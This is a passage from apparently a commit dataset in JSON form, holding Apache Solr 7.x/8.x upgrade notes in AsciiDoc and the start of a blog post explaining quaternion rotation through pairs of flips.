`class=\"org.apache.solr.metrics.reporters.solr.SolrShardReporter\"` attribute.\n** If a reporter configures the `group=\"cluster\"` attribute then please also configure the `class=\"org.apache.solr.metrics.reporters.solr.SolrClusterReporter\"` attribute.\n+\nSee the section <<metrics-reporting.adoc#shard-and-cluster-reporters,Shard and Cluster Reporters>> for more information.\n\n*Streaming Expressions*\n\n* All Stream Evaluators in `solrj.io.eval` have been refactored to have a simpler and more robust structure. This simplifies and condenses the code required to implement a new Evaluator and makes it much easier for evaluators to handle differing data types (primitives, objects, arrays, lists, and so forth).\n\n*ReplicationHandler*\n\n* In the ReplicationHandler, the `master.commitReserveDuration` sub-element is deprecated. Instead please configure a direct `commitReserveDuration` element for use in all modes (master, slave, cloud).\n\n*RunExecutableListener*\n\n* The `RunExecutableListener` was removed for security reasons. If you want to listen to events caused by updates, commits, or optimize, write your own listener as native Java class as part of a Solr plugin.\n\n*XML Query Parser*\n\n* In the XML query parser (`defType=xmlparser` or `{!xmlparser ... }`) the resolving of external entities is now disallowed by default.\n\nIf you are upgrading from a version earlier than Solr 7.0, please see <<major-changes-in-solr-7.adoc#major-changes-in-solr-7,Major Changes in Solr 7>> before starting your upgrade.\n\n== Upgrading to 7.x from Any 6.x Release\n\nThe upgrade from Solr 6.x to Solr 7.0 introduces several *major* changes that you should be aware of before upgrading. Please do a thorough review of the section <<major-changes-in-solr-7.adoc#major-changes-in-solr-7,Major Changes in Solr 7>> before starting your upgrade.\n\n== Upgrading to 7.x from pre-6.x Versions of Solr\n\nUsers upgrading from versions of Solr prior to 6.x are strongly encouraged to consult {solr-javadocs}\/changes\/Changes.html[`CHANGES.txt`] for the details of _all_ changes since the version they are upgrading from.\n\nA summary of the significant changes between Solr 5.x and Solr 6.0 is in the section <<major-changes-from-solr-5-to-solr-6.adoc#major-changes-from-solr-5-to-solr-6,Major Changes from Solr 5 to Solr 6>>.\n","old_contents":"= Solr Upgrade Notes\n:page-children: major-changes-in-solr-8, major-changes-in-solr-7, major-changes-from-solr-5-to-solr-6\n:page-toclevels: 3\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\nThe following notes describe changes to Solr in recent releases that you should be aware of before upgrading.\n\nThese notes highlight the biggest changes that may impact the largest number of implementations. It is not a comprehensive list of all changes to Solr in any release.\n\nWhen planning your Solr upgrade, consider the customizations you have made to your system and review the {solr-javadocs}\/changes\/Changes.html[`CHANGES.txt`] file found in your Solr package. That file includes all the changes and updates that may effect your existing implementation.\n\nDetailed steps for upgrading a Solr cluster are in the section <<upgrading-a-solr-cluster.adoc#upgrading-a-solr-cluster,Upgrading a Solr Cluster>>.\n\n== Upgrading to 8.x Releases\n\n=== Solr 8.1\n\n*Logging*\n\nSolr 8.1 changed the default log4j2 logging mode from synchronous to asynchronous. This will improve logging throughput and reduce system contention at the cost of a _slight_ chance that some logging messages may be missed in the event of abnormal Solr termination.\n\nIf even this slight risk is unacceptable, the log4j configuration file ..\/server\/resources\/log4j2.xml has the synchronous logging configuration in a commented section and can be edited to re-enable synchronous logging.\n\n== Upgrading to 7.x Releases\n\n=== Solr 7.6\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote76[7.6 Release Notes] for an overview of the main new features in Solr 7.6.\n\nWhen upgrading to Solr 7.6, users should be aware of the following major changes from v7.5:\n\n*Collections*\n\n* The JSON parameter to set cluster-wide default cluster properties with the <<collections-api.adoc#clusterprop,CLUSTERPROP>> command has changed.\n+\nThe old syntax nested the defaults into a property named `clusterDefaults`. The new syntax uses only `defaults`. The command to use is still `set-obj-property`.\n+\nAn example of the new syntax is:\n+\n[source,json]\n----\n{\n \"set-obj-property\": {\n \"defaults\" : {\n \"collection\": {\n \"numShards\": 2,\n \"nrtReplicas\": 1,\n \"tlogReplicas\": 1,\n \"pullReplicas\": 1\n }\n }\n }\n}\n----\n+\nThe old syntax will be supported until at least Solr 9, but users are advised to begin using the new syntax as soon as possible.\n\n* The parameter `min_rf` has been deprecated and no longer needs to be provided in order to see the achieved replication factor. This information will now always be returned to the client with the response.\n\n*Autoscaling*\n\n* An autoscaling policy is now used as the default strategy for selecting nodes on which new replicas or replicas of new collections are created.\n+\nA default policy is now in place for all users, which will sort nodes by the number of cores and available freedisk, which means by default a node with the fewest number of cores already on it and the highest available freedisk will be selected for new core creation.\n\n* The change described above has two additional impacts on the `maxShardsPerNode` parameter:\n\n. It removes the restriction against using `maxShardsPerNode` when an autoscaling policy is in place. This parameter can now always be set when creating a collection.\n. It removes the default setting of `maxShardsPerNode=1` when an autoscaling policy is in place. It will be set correctly (if required) regardless of whether an autoscaling policy is in place or not.\n+\nThe default value of `maxShardsPerNode` is still `1`. It can be set to `-1` if the old behavior of unlimited `maxSharedsPerNode` is desired.\n\n*DirectoryFactory*\n\n* Lucene has introduced the `ByteBuffersDirectoryFactory` as a replacement for the `RAMDirectoryFactory`, which will be removed in Solr 9.\n+\nWhile most users are still encouraged to use the `NRTCachingDirectoryFactory`, which allows Lucene to select the best directory factory to use, if you have explicitly configured Solr to use the `RAMDirectoryFactory`, you are encouraged to switch to the new implementation as soon as possible before Solr 9 is released.\n+\nFor more information about the new directory factory, see the Jira issue https:\/\/issues.apache.org\/jira\/browse\/LUCENE-8438[LUCENE-8438].\n+\nFor more information about the directory factory configuration in Solr, see the section <<datadir-and-directoryfactory-in-solrconfig.adoc#datadir-and-directoryfactory-in-solrconfig,DataDir and DirectoryFactory in SolrConfig>>.\n\n=== Solr 7.5\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote75[7.5 Release Notes] for an overview of the main new features in Solr 7.5.\n\nWhen upgrading to Solr 7.5, users should be aware of the following major changes from v7.4:\n\n*Schema Changes*\n\n* Since Solr 7.0, Solr's schema field-guessing has created `_str` fields for all `_txt` fields, and returned those by default with queries. As of 7.5, `_str` fields will no longer be returned by default. They will still be available and can be requested with the `fl` parameter on queries. See also the section on <<schemaless-mode.adoc#enable-field-class-guessing,field guessing>> for more information about how schema field guessing works.\n* The Standard Filter, which has been non-operational since at least Solr v4, has been removed.\n\n*Index Merge Policy*\n\n* When using the <<indexconfig-in-solrconfig.adoc#mergepolicyfactory,`TieredMergePolicy`>>, the default merge policy for Solr, `optimize` and `expungeDeletes` now respect the `maxMergedSegmentMB` configuration parameter, which defaults to `5000` (5GB).\n+\nIf it is absolutely necessary to control the number of segments present after optimize, specify `maxSegments` as a positive integer. Setting `maxSegments` higher than `1` are honored on a \"best effort\" basis.\n+\nThe `TieredMergePolicy` will also reclaim resources from segments that exceed `maxMergedSegmentMB` more aggressively than earlier.\n\n*UIMA Removed*\n\n* The UIMA contrib has been removed from Solr and is no longer available.\n\n*Logging*\n\n* Solr's logging configuration file is now located in `server\/resources\/log4j2.xml` by default.\n\n* A bug for Windows users has been corrected. When using Solr's examples (`bin\/solr start -e`) log files will now be put in the correct location (`example\/` instead of `server`). See also <<installing-solr.adoc#solr-examples,Solr Examples>> and <<solr-control-script-reference.adoc#solr-control-script-reference,Solr Control Script Reference>> for more information.\n\n\n=== Solr 7.4\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote74[7.4 Release Notes] for an overview of the main new features in Solr 7.4.\n\nWhen upgrading to Solr 7.4, users should be aware of the following major changes from v7.3:\n\n*Logging*\n\n* Solr now uses Log4j v2.11. The Log4j configuration is now in `log4j2.xml` rather than `log4j.properties` files. This is a server side change only and clients using SolrJ won't need any changes. Clients can still use any logging implementation which is compatible with SLF4J. We now let Log4j handle rotation of Solr logs at startup, and `bin\/solr` start scripts will no longer attempt this nor move existing console or garbage collection logs into `logs\/archived` either. See <<configuring-logging.adoc#configuring-logging,Configuring Logging>> for more details about Solr logging.\n\n* Configuring `slowQueryThresholdMillis` now logs slow requests to a separate file named `solr_slow_requests.log`. Previously they would get logged in the `solr.log` file.\n\n*Legacy Scaling (non-SolrCloud)*\n\n* In the <<index-replication.adoc#index-replication,master-slave model>> of scaling Solr, a slave no longer commits an empty index when a completely new index is detected on master during replication. To return to the previous behavior pass `false` to `skipCommitOnMasterVersionZero` in the slave section of replication handler configuration, or pass it to the `fetchindex` command.\n\nIf you are upgrading from a version earlier than Solr 7.3, please see previous version notes below.\n\n=== Solr 7.3\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote73[7.3 Release Notes] for an overview of the main new features in Solr 7.3.\n\nWhen upgrading to Solr 7.3, users should be aware of the following major changes from v7.2:\n\n*ConfigSets*\n\n* Collections created without specifying a configset name have used a copy of the `_default` configset since Solr 7.0. Before 7.3, the copied configset was named the same as the collection name, but from 7.3 onwards it will be named with a new \".AUTOCREATED\" suffix. This is to prevent overwriting custom configset names.\n\n*Learning to Rank*\n\n* The `rq` parameter used with Learning to Rank `rerank` query parsing no longer considers the `defType` parameter. See <<learning-to-rank.adoc#running-a-rerank-query,Running a Rerank Query>> for more information about this parameter.\n\n*Autoscaling & AutoAddReplicas*\n\n* The behaviour of the autoscaling system will now pause all triggers from execution between the start of actions and the end of a cool down period. The triggers will resume after the cool down period expires. Previously, the cool down period was a fixed period started after actions for a trigger event completed and during this time all triggers continued to run but any events were rejected and tried later.\n\n* The throttling mechanism used to limit the rate of autoscaling events processed has been removed. This deprecates the `actionThrottlePeriodSeconds` setting in the <<solrcloud-autoscaling-api.adoc#change-autoscaling-properties,`set-properties` Autoscaling API>> which is now non-operational. Use the `triggerCooldownPeriodSeconds` parameter instead to pause event processing.\n\n* The default value of `autoReplicaFailoverWaitAfterExpiration`, used with the AutoAddReplicas feature, has increased to 120 seconds from the previous default of 30 seconds. This affects how soon Solr adds new replicas to replace the replicas on nodes which have either crashed or shutdown.\n\n*Logging*\n\n* The default Solr log file size and number of backups have been raised to 32MB and 10 respectively. See the section <<configuring-logging.adoc#configuring-logging,Configuring Logging>> for more information about how to configure logging.\n\n*SolrCloud*\n\n* The old Leader-In-Recovery implementation (implemented in Solr 4.9) is now deprecated and replaced. Solr will support rolling upgrades from old 7.x versions of Solr to future 7.x releases until the last release of the 7.x major version.\n+\nThis means to upgrade to Solr 8 in the future, you will need to be on Solr 7.3 or higher.\n\n* Replicas which are not up-to-date are no longer allowed to become leader. Use the <<collections-api.adoc#forceleader,FORCELEADER command>> of the Collections API to allow these replicas become leader.\n\n*Spatial*\n\n* If you are using the spatial JTS library with Solr, you must upgrade to 1.15.0. This new version of JTS is now dual-licensed to include a BSD style license. See the section on <<spatial-search.adoc#spatial-search,Spatial Search>> for more information.\n\n*Highlighting*\n\n* The top-level `<highlighting>` element in `solrconfig.xml` is now officially deprecated in favour of the equivalent `<searchComponent>` syntax. This element has been out of use in default Solr installations for several releases already.\n\nIf you are upgrading from a version earlier than Solr 7.2, please see previous version notes below.\n\n=== Solr 7.2\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote72[7.2 Release Notes] for an overview of the main new features in Solr 7.2.\n\nWhen upgrading to Solr 7.2, users should be aware of the following major changes from v7.1:\n\n*Local Parameters*\n\n* Starting a query string with <<local-parameters-in-queries.adoc#local-parameters-in-queries,local parameters>> `{!myparser ...}` is used to switch from one query parser to another, and is intended for use by Solr system developers, not end users doing searches. To reduce negative side-effects of unintended hack-ability, Solr now limits the cases when local parameters will be parsed to only contexts in which the default parser is \"<<other-parsers.adoc#lucene-query-parser,lucene>>\" or \"<<other-parsers.adoc#function-query-parser,func>>\".\n+\nSo, if `defType=edismax` then `q={!myparser ...}` won't work. In that example, put the desired query parser into the `defType` parameter.\n+\nAnother example is if `deftype=edismax` then `hl.q={!myparser ...}` won't work for the same reason. In this example, either put the desired query parser into the `hl.qparser` parameter or set `hl.qparser=lucene`. Most users won't run into these cases but some will need to change.\n+\nIf you must have full backwards compatibility, use `luceneMatchVersion=7.1.0` or an earlier version.\n\n*eDisMax Parser*\n\n* The eDisMax parser by default no longer allows subqueries that specify a Solr parser using either local parameters, or the older `\\_query_` magic field trick.\n+\nFor example, `{!prefix f=myfield v=enterp}` or `\\_query_:\"{!prefix f=myfield v=enterp}\"` are not supported by default any longer. If you want to allow power-users to do this, set `uf=* _query_` or some other value that includes `\\_query_`.\n+\nIf you need full backwards compatibility for the time being, use `luceneMatchVersion=7.1.0` or something earlier.\n\nIf you are upgrading from a version earlier than Solr 7.1, please see previous version notes below.\n\n=== Solr 7.1\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote71[7.1 Release Notes] for an overview of the main new features of Solr 7.1.\n\nWhen upgrading to Solr 7.1, users should be aware of the following major changes from v7.0:\n\n*AutoAddReplicas*\n\n* The feature to automatically add replicas if a replica goes down, previously available only when storing indexes in HDFS, has been ported to the autoscaling framework. Due to this, `autoAddReplicas` is now available to all users even if their indexes are on local disks.\n+\nExisting users of this feature should not have to change anything. However, they should note these changes:\n\n** Behavior: Changing the `autoAddReplicas` property from disabled (`false`) to enabled (`true`) using <<collections-api.adoc#modifycollection,MODIFYCOLLECTION API>> no longer replaces down replicas for the collection immediately. Instead, replicas are only added if a node containing them went down while `autoAddReplicas` was enabled. The parameters `autoReplicaFailoverBadNodeExpiration` and `autoReplicaFailoverWorkLoopDelay` are no longer used.\n** Deprecations: Enabling\/disabling autoAddReplicas cluster-wide with the API will be deprecated; use suspend\/resume trigger APIs with `name=\".auto_add_replicas\"` instead.\n+\nMore information about the changes to this feature can be found in the section <<solrcloud-autoscaling-auto-add-replicas.adoc#solrcloud-autoscaling-auto-add-replicas,SolrCloud Automatically Adding Replicas>>.\n\n*Metrics Reporters*\n\n* Shard and cluster metric reporter configuration now require a `class` attribute.\n** If a reporter configures the `group=\"shard\"` attribute then please also configure the `class=\"org.apache.solr.metrics.reporters.solr.SolrShardReporter\"` attribute.\n** If a reporter configures the `group=\"cluster\"` attribute then please also configure the `class=\"org.apache.solr.metrics.reporters.solr.SolrClusterReporter\"` attribute.\n+\nSee the section <<metrics-reporting.adoc#shard-and-cluster-reporters,Shard and Cluster Reporters>> for more information.\n\n*Streaming Expressions*\n\n* All Stream Evaluators in `solrj.io.eval` have been refactored to have a simpler and more robust structure. This simplifies and condenses the code required to implement a new Evaluator and makes it much easier for evaluators to handle differing data types (primitives, objects, arrays, lists, and so forth).\n\n*ReplicationHandler*\n\n* In the ReplicationHandler, the `master.commitReserveDuration` sub-element is deprecated. Instead please configure a direct `commitReserveDuration` element for use in all modes (master, slave, cloud).\n\n*RunExecutableListener*\n\n* The `RunExecutableListener` was removed for security reasons. If you want to listen to events caused by updates, commits, or optimize, write your own listener as native Java class as part of a Solr plugin.\n\n*XML Query Parser*\n\n* In the XML query parser (`defType=xmlparser` or `{!xmlparser ... }`) the resolving of external entities is now disallowed by default.\n\nIf you are upgrading from a version earlier than Solr 7.0, please see <<major-changes-in-solr-7.adoc#major-changes-in-solr-7,Major Changes in Solr 7>> before starting your upgrade.\n\n== Upgrading to 7.x from Any 6.x Release\n\nThe upgrade from Solr 6.x to Solr 7.0 introduces several *major* changes that you should be aware of before upgrading. Please do a thorough review of the section <<major-changes-in-solr-7.adoc#major-changes-in-solr-7,Major Changes in Solr 7>> before starting your upgrade.\n\n== Upgrading to 7.x from pre-6.x Versions of Solr\n\nUsers upgrading from versions of Solr prior to 6.x are strongly encouraged to consult {solr-javadocs}\/changes\/Changes.html[`CHANGES.txt`] for the details of _all_ changes since the version they are upgrading from.\n\nA summary of the significant changes between Solr 5.x and Solr 6.0 is in the section <<major-changes-from-solr-5-to-solr-6.adoc#major-changes-from-solr-5-to-solr-6,Major Changes from Solr 5 to Solr 6>>.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"32df9a5eb5132deda52f8f9c5821d06aab0f875f","subject":"Update 2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation-Part-1-Theory.adoc","message":"Update 2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation-Part-1-Theory.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation-Part-1-Theory.adoc","new_file":"_posts\/2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation-Part-1-Theory.adoc","new_contents":"= An Easy Way to Understand Quaternion and Rotation: Part 1. Theory\nEric Zhang\n\n:stem: latexmath\n:figure-caption!:\n\n\nQuaternion is widely used in game engines to represent 3D rotation. As a game engineer you might be using quaternion explicitly or implicitly in your daily work, but do you really understand what is going on under the hood when you are calling \u201crotate a vector\u201d or \u201ccombine two rotations\u201d? Why rotating a vector stem:[v] by quaternion stem:[q] is calculated by a \u201csandwich\u201d multiplication: stem:[qvq^{-1}] ? Why rotating by quaternion stem:[q_1] then stem:[q_2] is in the reversed order: stem:[{q_2}{q_1}], and can you visualize the result rotation axis and angle?\n\nUnderstanding quaternions also leads to more efficient use of quaternion. For example, one common situation in game development is that we need an object to face its opposite direction. What we usually would do is to get the normal or forward vector, negate it, build a rotation out of it, and assign the rotation to the object. Later in this article we will see how much calculation we need to do in this process. However with the understanding of quaternion, we only need to do stem:[q=(q.y,-q.x,q.w,-q.z)], and I will show you why.\n\nIn this article, I will try to avoid touching the algebra structure of quaternion, or having to imagine a 4 dimensional hyper sphere. I will start with a special rotation operation: flip, and use that to visualize quaternion in a more accessible and geometrical way. This article will be split into 2 parts. In Part 1 we will talk about the idea of quaternion, understand and visualize how it rotates a vector and how to compose rotations. In Part 2 we will talk about how to make use of our understanding in Part 1, and how it is used in game engine versus rotation matrix and Euler angle.\n\nI would assume you are comfortable with 3D math (vector dot product and cross product) and basic trigonometry.\n\n=== Quaternion Definition\n\nQuaternion is a 4-tuple denoted as stem:[q=(x,y,z,w)]. The length of a quaternion is defined as stem:[\\left|q\\right| =\\sqrt{x^{2}+y^{2}+z^{2}+w^{2}}], just as you would expected from a 4D vector. \n\nIn order to represent 3D rotation, we have a constraint on the quaternions we use. But before that I want to introduce Euler\u2019s rotation theorem:\n\n*_Any rotation in 3D space is equivalent to a single rotation of angle stem:[\u03b8] along some axis stem:[\\vec{v}]._*\n\nWe can use quaternion to describe this angle-axis rotation : stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v}.x,sin\u2061\\frac{\u03b8}{2}\\vec{v}.y,sin\u2061\\frac{\u03b8}{2}\\vec{v}.z,cos\u2061\\frac{\u03b8}{2})], or in a more compact form stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})]. We call this form the vector form of a quaternion, and we will use this form throughout this article. You might be thinking why we are using stem:[\\frac{\u03b8}{2}] other than using stem:[\u03b8] directly. I will explain that in a later section.\n\nIt is easy to see the length of this quaternion stem:[\\left|q\\right|=\\sqrt{sin^{2}\\frac{\u03b8}{2}\\left|\\vec{v}\\right|^{2}+cos^{2}\\frac{\u03b8}{2}}=1]. (Remember the axis stem:[\\vec{v}] is a unit vector that stem:[\\left|\\vec{v}\\right|=1]). We call it a unit quaternion if the length stem:[\\left|q\\right|=1]. So we can rewrite Euler\u2019s rotation theorem in quaternion term:\n\n*_Any 3D rotation is equivalent a unit quaternion stem:[q] that stem:[\\left|q\\right|=1]._*\n\n---\n.Side Note\n****\nThis claim actually has 2 sides. Let me go a little be more in details in math term: \n(1). For any 3D rotation equivalent to a rotation angle stem:[\u03b8] along axis stem:[\\vec{v}], there exists a unit quaternion stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] to describe this rotation. \n(2). For any unit quaternion stem:[q=(x,y,z,w)], it describes a rotation of angle stem:[\u03b8=2cos^{-1}w] along axis stem:[\\vec{v}=\\frac{(x,y,z)}{\\sqrt{1-w^{2}}}].\n\n****\n---\n\nFrom now on, any quaternion stem:[q] used in this article is by default a unit quaternion, and we will use stem:[q] to describe rotations.\n\n=== Rotation and Flip\n\nNow let\u2019s forget quaternion for a minute, and focus on the nature of rotations. This part is the key to understand quaternion calculation in an easier way.\n\n*_Any 3D rotation can be composed by 2 flips along some axes._*\n\nThe reason we want to break down a rotation into flips, is that flips are much easier to think and calculate than general 3D rotation. We will start from flip and build our way to understand rotation.\nHere is a loose proof of this idea. We define counter-clockwise as the positive direction of rotation. First consider a special case. We have a rotation stem:[q], which rotates stem:[+90^{\\circ}] along axis stem:[\\vec{Z}]. Now I can say this rotation is the same as 2 flips along axis stem:[\\vec{a}] and stem:[\\vec{b}], both of them are on XY plane, and the angle from stem:[\\vec{a}] to stem:[\\vec{b}] is stem:[+45^{\\circ}].\n\n.Figure 1 (a)\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig1.png[, 300,float=\"right\",align=\"center\"]\n.Figure 1 (b)\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig1_b.png[, 300,float=\"right\",align=\"center\"]\n\nWe demonstrate this through Figure 1. For any vector stem:[\\vec{v}], the result of this rotation is stem:[\\vec{v''}] , which is the same as flip stem:[\\vec{v}] along axis stem:[\\vec{a}] and get stem:[\\vec{v'}], and then flip stem:[\\vec{v'}] along axis stem:[\\vec{b}] and get stem:[\\vec{v''}]. \n\nIt doesn\u2019t matter where stem:[\\vec{a}] and stem:[\\vec{b}] are on the XY plane, but the order must be kept. If we choose stem:[\\vec{b}] by rotating stem:[\\vec{a}] along axis stem:[\\vec{Z}] by stem:[+45^{\\circ}] with the positive direction we defined above, then we must flip along stem:[\\vec{a}] first then along stem:[\\vec{b}] to get our target rotation. The order and the sign of angle is important, as you can easily see flip along stem:[\\vec{b}] first then along stem:[\\vec{a}] will give a different result.\n\nIt\u2019s not hard to generalize to a rotation of any angle stem:[\u03b8] along stem:[\\vec{Z}] axis. And in this case, the angle from stem:[\\vec{a}] to stem:[\\vec{b}] is stem:[\\frac{\u03b8}{2}].\n\nWhat if the axis is not stem:[\\vec{Z}] axis but any unit vector stem:[\\vec{u}] ? It turns out to be very straight forward. stem:[\\vec{a}] and stem:[\\vec{b}] are no longer on XY plane but on a plane cross the origin and perpendicular to stem:[\\vec{u}], as in Figure 2.\n\n.Figure 2\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig2.png[, 400,align=\"center\"]\n\nNow we can rewrite our flip composition rule in a more specific form:\n\n*_Any 3D rotation equivalent to rotating angle stem:[\u03b8] along axis stem:[\\vec{v}] can be represented as a sequence of 2 flips along axis stem:[\\vec{a}] and stem:[\\vec{b}], such that stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and the angle from stem:[\\vec{a}] to stem:[\\vec{b}]: stem:[<\\vec{a},\\vec{b}>=\\frac{\u03b8}{2}]._*\n\nThis representation means if we fully understand flip, which is easier to visualize, we can fully understand rotation and quaternions, since any quaternion can be broken down to flips.\n\n=== Quaternion and Flip\n\nNow let\u2019s recall the quaternion vector form stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})]. With the discussion of flips above, you can almost immediately see why we are using stem:[\\frac{\u03b8}{2}] here.\n\nThink about flips again. A flip along axis stem:[\\vec{a}] is also a stem:[180^{\\circ}] rotation along axis stem:[\\vec{a}]. So this flip can be represented in quaternion term \n\n[stem]\n++++\nq_a=(sin\u2061\\frac{180^{\\circ}}{2}\\vec{a},cos\u2061\\frac{180^{\\circ}}{2})=(\\vec{a},0)\n++++\n\nFrom now on we will use quaternion to represent flip. Actually any unit quaternion with stem:[q.w=0] is a flip along axis stem:[(q.x,q.y,q.z)].\n\n=== Flip Composition\n\nHere we need to introduce the multiplication of general quaternion. Let stem:[q_1=(\\vec{v_1},w_1)], stem:[q_2=(\\vec{v_2},w_2)] then\n\n[stem]\n++++\n{q_1}{q_2}=(\\vec{v_1},w_1)(\\vec{v_2},w_2)=(w_1\\vec{v_1} + w_2\\vec{v_2} + \\vec{v_1}\u00d7\\vec{v_2}, {w_1}{w_2}-\\vec{v_1}\u00b7\\vec{v_2})\n++++\n\nNote here stem:[q_1] and stem:[q_2] are not necessarily unit quaternion, so even I\u2019m using vector form, there\u2019s no need to put stem:[sin\u2061\\frac{\u03b8}{2}] and stem:[cos\u2061\\frac{\u03b8}{2}] as we did for unit quaternions. It\u2019s hard to explain this definition without introducing the algebra structure of quaternions, so I will skip that. If you are interesting to know how this is derived, quaternion https:\/\/en.wikipedia.org\/wiki\/Quaternion#Definition[Wiki page] has a very straight forward introduction.\n\nWe are not going to use this general quaternion multiplication in Part 1. Here we only need to know a simpler form, the multiplication of flips. Let stem:[q_a=(\\vec{a},0)], stem:[q_b=(\\vec{b},0)] then\n\n[stem]\n++++\n{q_a}{q_b}=(\\vec{a},0)(\\vec{b},0)=(\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})\n++++\n\nIt is naturally derived from the general form, and we will be only using this multiplication in Part 1.\n\nWith flip multiplication defined, we can rewrite our flip composition rule again:\n\n*_Any 3D rotation stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] can be represented as a sequence of 2 flips stem:[q_a=(\\vec{a},0)] and stem:[q_b=(\\vec{b},0)], such that_*\n[stem]\n++++\nq=-{q_b}{q_a}\n++++\n*_where stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and the angle from stem:[\\vec{a}] to stem:[\\vec{b}]: stem:[<\\vec{a},\\vec{b}>=\\frac{\u03b8}{2}]._*\n\nYou might be thinking why it is not stem:[q= {q_a}{q_b}] instead. We will show where the order and the negative sign coming from in the proof.\n\nstem:[\\vec{a}\u00b7\\vec{b}=cos<\\vec{a},\\vec{b}>\\left|\\vec{a}\\right|\\left|\\vec{b}\\right|=cos\\frac{\u03b8}{2}]. Since stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and stem:[\\left|\\vec{v}\\right|=1], we have stem:[\\vec{a}\u00d7\\vec{b}=sin<\\vec{a},\\vec{b}>\\left|\\vec{a}\\right|\\left|\\vec{b}\\right|\\vec{v}=sin\\frac{\u03b8}{2}\\vec{v}].\n\nIf you are not sure about the direction of the cross product, see Figure 2.\n\n[stem]\n++++\n\\begin{align*}\nq&=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})\\\\\n&=(\\vec{a}\u00d7\\vec{b},\\vec{a}\u00b7\\vec{b})\\\\\n&=-(-\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})\\\\\n&=(\\vec{b}\u00d7\\vec{a},-\\vec{a}\u00b7\\vec{b})\\\\\n&=-{q_b}{q_a}\n\\end{align*}\n++++\n\nHere you can also clearly see why we are using stem:[sin\u2061\\frac{\u03b8}{2}] and stem:[cos\u2061\\frac{\u03b8}{2}] in quaternions.\n\nOne thing I need to mention here is the negation of a quaternion. stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})], then\n\n[stem]\n++++\n\\begin{align*}\n{-q}&=(-sin\u2061\\frac{\u03b8}{2}\\vec{v},-cos\u2061\\frac{\u03b8}{2})\\\\\n&=(-sin\u2061\\frac{2\u03c0-\u03b8}{2}\\vec{v},cos\u2061\\frac{2\u03c0-\u03b8}{2})\\\\\n&=(sin\u2061\\frac{-(2\u03c0-\u03b8)}{2}\\vec{v},cos\u2061\\frac{-(2\u03c0-\u03b8)}{2})\\\\\n\\end{align*}\n++++\n\nRecall that stem:[sin\u2061\u03b8=sin(\u03c0-\u03b8)] and stem:[-cos\u2061\u03b8=cos(\u03c0-\u03b8)], then stem:[-sin\u2061\u03b8=sin(-\u03b8)] and stem:[cos\u2061\u03b8=cos(-\u03b8)].\n\nIt shows that stem:[-q] is a rotation along axis stem:[\\vec{v}] of angle stem:[-(2\u03c0-\u03b8)], which is exactly the same rotation as stem:[q]. For example if stem:[\u03b8=90^{\\circ}] then stem:[-(2\u03c0-\u03b8)=-270^{\\circ}], rotate stem:[90^{\\circ}] along axis stem:[\\vec{v}] is the same as rotate stem:[270^{\\circ}] degree but in the opposite direction along the same axis stem:[\\vec{v}]. \n\nThe fact that stem:[q] and stem:[\u2013q] represents the same rotation is usually called double-cover. However in our calculation I don\u2019t want you to simply think stem:[q] and stem:[\u2013q] are the same. They are different in quaternion space, even though they map to the same 3D rotation. The negative sign of the flip composition needs to be there.\n\nThe order of stem:[q=-{q_b}{q_a}] on the right hand side is important. It means flip along stem:[\\vec{a}] first and then stem:[\\vec{b}]. Actually all unit quaternion multiplication needs to be \u201cread\u201d from right to left when we are thinking about the order of applying those rotations.\n\n---\n.Side Note\n****\nWe can however get rid of the negative sign by choosing stem:[\\vec{a}] and stem:[\\vec{b}] differently.\n\n_Any 3D rotation stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] can be represented as a sequence of 2 flips stem:[q_a=(\\vec{a},0)] and stem:[q_b=(\\vec{b},0)], such that\nstem:[q={q_b}{q_a}]\nwhere stem:[\\vec{a}\u00b7\\vec{v}=0], 